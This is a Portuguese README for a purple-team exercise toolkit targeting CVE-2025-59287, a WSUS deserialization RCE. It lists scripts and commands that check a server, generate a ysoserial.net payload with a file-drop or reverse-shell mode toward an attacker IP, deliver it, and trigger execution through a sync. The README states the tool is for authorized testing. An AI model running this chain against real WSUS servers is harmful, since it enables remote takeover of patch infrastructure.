
Scripts de exercício de equipe roxa demonstrando CVE-2025-59287, um RCE não autenticado no WSUS via injeção de payload de desserialização maliciosa no banco de dados do WSUS.
Scripts de exercício de time roxo para o CVE-2025-59287, uma vulnerabilidade de execução remota de código não autenticada no Windows Server Update Services (WSUS).
Uso autorizado apenas. Para uso em ambientes de exercício controlados contra sistemas que você possui ou tem permissão explícita por escrito para testar.
A vulnerabilidade abusa de endpoints SOAP do WSUS acessíveis anonimamente para injetar um payload malicioso de desserialização no banco de dados do WSUS. O payload é executado quando o console administrativo do WSUS é aberto ou uma sincronização é acionada.
8530ysoserial\Release\ (consulte Configuração)wsus-cve-2025-59287/
├── 1-check.ps1 # Verify target is vulnerable
├── 2-generate.ps1 # Generate serialized payload blob
├── 3-deliver.ps1 # Deliver payload to WSUS server
├── 4-verify.ps1 # Verify execution and clean up
├── ysoserial/ # Place ysoserial.net release here (not committed)
│ └── Release/
│ └── ysoserial.exe
└── README.md
Clone ou baixe o repositório. Adicione o ysoserial.net para que o caminho corresponda a ysoserial\Release\ysoserial.exe.
Baixe o ysoserial.net de: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 Isso acionará o Windows Defender por padrão.
Execute todos os scripts a partir da raiz do repositório.
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"
File drop (no listener needed, recommended first):
.\2-generate.ps1 -Mode filedrop
Reverse shell:
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"
No servidor WSUS, abra o console administrativo via Iniciar > Windows Server Update Services, ou acione uma sincronização via PowerShell:
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()
Verificar execução:
.\4-verify.ps1
Verificar e limpar todos os artefatos:
.\4-verify.ps1 -Cleanup
Da caixa de ataque via compartilhamento administrativo:
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup
Após a limpeza, remova o computador do exercício do console do WSUS em Computadores.